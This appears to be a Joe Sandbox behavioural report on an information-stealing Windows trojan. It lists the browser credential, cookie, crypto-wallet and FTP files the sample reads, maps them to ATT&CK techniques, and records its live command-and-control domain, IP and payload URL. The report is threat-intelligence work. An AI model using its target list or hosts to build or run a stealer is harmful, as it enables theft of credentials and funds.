    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffffla
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

    Remote Access Functionality

    Source: Yara match | File source: sslproxydump.pcap, type: PCAP
    MITRE ATT&CK matrix (numbers in parentheses are the counts shown next to a technique in the report's matrix; techniques without a number carried no count):

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
    Execution: Windows Management Instrumentation (12); Scheduled Task/Job; At; Cron; Launchd
    Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
    Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
    Defense Evasion: Virtualization/Sandbox Evasion (44); Process Injection (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
    Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
    Discovery: Security Software Discovery (851); Virtualization/Sandbox Evasion (44); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (223)
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
    Collection: Archive Collected Data (1); Data from Local System (31); Data from Network Shared Drive; Input Capture; Keylogging
    Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (13); Protocol Impersonation; Fallback Channels
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
    Behavior Graph (ID 1648110; sample ASIr1Bo2x9.exe; start date 25/03/2025; architecture WINDOWS; score 100)

    The graph's root node carries the signatures "Antivirus detection for URL or domain", "Antivirus / Scanner detection for submitted sample", "Multi AV Scanner detection for submitted file" and 3 other signatures, and resolves wxayfarer.live. It starts the single process ASIr1Bo2x9.exe, which connects to 176.113.115.7 on port 80 (SELECTELRU, Russian Federation) and to wxayfarer.live at 104.21.80.1 on port 443 (local ports 49723, 49724; CLOUDFLARENETUS, United States). Signatures on the process node: "Detected unpacking (changes PE section rights)", "Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)", "Query firmware table information (likely to detect VMs)" and 9 other signatures.

    Antivirus detection for the sample (Source | Detection | Scanner | Label):
    ASIr1Bo2x9.exe | 58% | Virustotal |
    ASIr1Bo2x9.exe | 69% | ReversingLabs | Win32.Trojan.Cerbu
    ASIr1Bo2x9.exe | 100% | Avira | TR/Crypt.TPM.Gen

    No Antivirus matches
    No Antivirus matches
    No Antivirus matches

    Antivirus detection for URLs (Source | Detection | Scanner | Label):
    https://wxayfarer.live/ALosnz6/D | 100% | Avira URL Cloud | malware
    http://176.113.115.7:80/mine/random.exe | 100% | Avira URL Cloud | malware
    https://wxayfarer.live/ALosnzNp | 100% | Avira URL Cloud | malware
    http://176.113.115.7/mine/ran | 0% | Avira URL Cloud | safe
    https://wxayfarer.live/$~ | 100% | Avira URL Cloud | malware
    http://176.113.115.7/mine/random.exe. | 100% | Avira URL Cloud | malware
    https://wxayfarer.live/ALosnzl9 | 100% | Avira URL Cloud | malware
    http://176.113.115.7// | 0% | Avira URL Cloud | safe
    https://wxayfarer.live:443/ALosnz | 100% | Avira URL Cloud | malware
    https://wxayfarer.live/ALosnze | 100% | Avira URL Cloud | malware
    https://wxayfarer.live/ALosnzc | 100% | Avira URL Cloud | malware


    Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
    wxayfarer.live | 104.21.80.1 | true | false | | high

    URLs contacted (Name | Malicious | Antivirus Detection | Reputation):
    https://wxayfarer.live/ALosnz | false | | high

    URL strings found in memory (Name; Source; Malicious; Antivirus Detection; Reputation):

    https://wxayfarer.live/ALosnz6/D
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629043916.0000000000D89000.00000004.00000020.00020000.00000000.sdmp
      Malicious: true | Avira URL Cloud: malware | Reputation: unknown
    http://176.113.115.7:80/mine/random.exe
      Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp
      Malicious: true | Avira URL Cloud: malware | Reputation: unknown
    http://176.113.115.7/mine/ran
      Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp
      Malicious: false | Avira URL Cloud: safe | Reputation: unknown
    https://duckduckgo.com/ac/?q=
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    https://wxayfarer.live/$~
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1384924260.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1392937738.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385837903.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp
      Malicious: true | Avira URL Cloud: malware | Reputation: unknown
    http://176.113.115.7/mine/random.exe.
      Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp
      Malicious: true | Avira URL Cloud: malware | Reputation: unknown
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    http://crl.rootca1.amazontrust.com/rootca1.crl0
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    https://ac.ecosia.org?q=
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    http://176.113.115.7/mine/random.exe
      Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    http://ocsp.rootca1.amazontrust.com0:
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    https://wxayfarer.live/
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1392937738.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385837903.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1299973451.0000000000D74000.00000004.00000020.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    https://wxayfarer.live/ALosnzNp
      Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1392937738.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp
      Malicious: true | Avira URL Cloud: malware | Reputation: unknown
    https://www.google.com/images/branding/product/ico/googleg_alldp.ico
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    https://www.ecosia.org/newtab/v20
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    https://wxayfarer.live/ALosnzl9
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1384966149.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1375125685.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp
      Malicious: false | Avira URL Cloud: malware | Reputation: unknown
    http://x1.c.lencr.org/0
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    http://x1.i.lencr.org/0
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    https://duckduckgo.com/chrome_newtabv20
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    http://176.113.115.7//
      Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp
      Malicious: false | Avira URL Cloud: safe | Reputation: unknown
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    https://wxayfarer.live:443/ALosnz
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1325200671.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1375125685.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp
      Malicious: false | Avira URL Cloud: malware | Reputation: unknown
    http://crt.rootca1.amazontrust.com/rootca1.cer0?
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    https://wxayfarer.live/ALosnze
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1392893647.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1408641390.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385095106.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1386096339.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1408441458.0000000000E11000.00000004.00000020.00020000.00000000.sdmp
      Malicious: false | Avira URL Cloud: malware | Reputation: unknown
    https://support.mozilla.org/products/firefoxgro.all
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    https://wxayfarer.live/ALosnzc
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1325142805.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1325382510.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1325302395.0000000000E11000.00000004.00000020.00020000.00000000.sdmp
      Malicious: false | Avira URL Cloud: malware | Reputation: unknown
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    https://gemini.google.com/app?q=
      Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    http://176.113.115.7/
      Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp
      Malicious: false | Reputation: high
    IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
    176.113.115.7 | unknown | Russian Federation | 49505 | SELECTELRU | false
    104.21.80.1 | wxayfarer.live | United States | 13335 | CLOUDFLARENETUS | false
    Joe Sandbox version: 42.0.0 Malachite
    Analysis ID: 1648110
    Start date and time: 2025-03-25 14:58:08 +01:00
    Joe Sandbox product: CloudBasic
    Overall analysis duration: 0h 5m 52s
    Hypervisor based Inspection enabled: false
    Report type: full
    Cookbook file name: default.jbs
    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of new started processes analysed: 11
    Number of new started drivers analysed: 0
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Sample name: ASIr1Bo2x9.exe (renamed because the original name is a hash value)
    Original Sample Name: f9915de2e2ca00d8d19a8d021b433926.exe
    Detection: MAL
    Classification: mal100.troj.spyw.evad.winEXE@1/0@1/2
    EGA Information: Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 4
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 184.31.69.3, 4.175.87.197
    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target ASIr1Bo2x9.exe, PID 7588 because there are no executed functions
    • Not all processes were analyzed; the report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
